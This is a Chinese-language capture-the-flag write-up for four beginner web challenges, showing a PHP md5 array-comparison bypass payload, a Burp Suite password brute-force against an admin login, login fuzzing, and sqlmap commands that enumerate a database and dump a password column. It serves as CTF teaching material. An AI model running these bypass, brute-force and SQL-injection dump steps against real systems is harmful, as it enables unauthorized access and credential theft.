0x01 CheckMe05

题目源码:

1
2
3
4
5
6
7
<?php
$a=$_GET["a"];
$b=$_GET["b"];
if($a!==$b && md5($a)===md5($b)){
echo($flag);
}
?>

强类型比较,当给md5()提供的变量为数组时,返回null,则有null === null,这样可以绕过强类型比较

所以最终payload:

1
GET /?a[]=1&b[]=2

image-20221128234313279

0x01 CheckMe06

下载题目给的附件📎:list.txt

进入环境使用Burpsuite或者yakit抓包,用户名为admin

爆破密码:

image-20221128234842988

在返回包中得到flag

0x01 CheckMe07

进入环境,还是登入页面。

usernamepasswordfuzz一下直接出flag:

image-20221128235940478

0x01 CheckMe08

这题演示一下使用sqlmap的基本步骤

还是那个登入页面,使用burpsuite抓包,右键抓的数据包选择copy to file

image-20221129000335046

然后使用sqlmap,测试出这是时间盲注:

1
❯ sqlmap -r "/Users/q1jun/Downloads/post.txt" --dbs

这题中如果看不懂英文,一路回车即可,该命令如果sqlmap测试成功,则会返回数据库名。

image-20221129001034116

爆表名:

1
sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql --tables

image-20221129001211512

爆列名:

1
sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql -T user --columns

image-20221129001611330

查看password列的数据,拿到flag:

1
sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql -T user -C password --dump

image-20221129002854913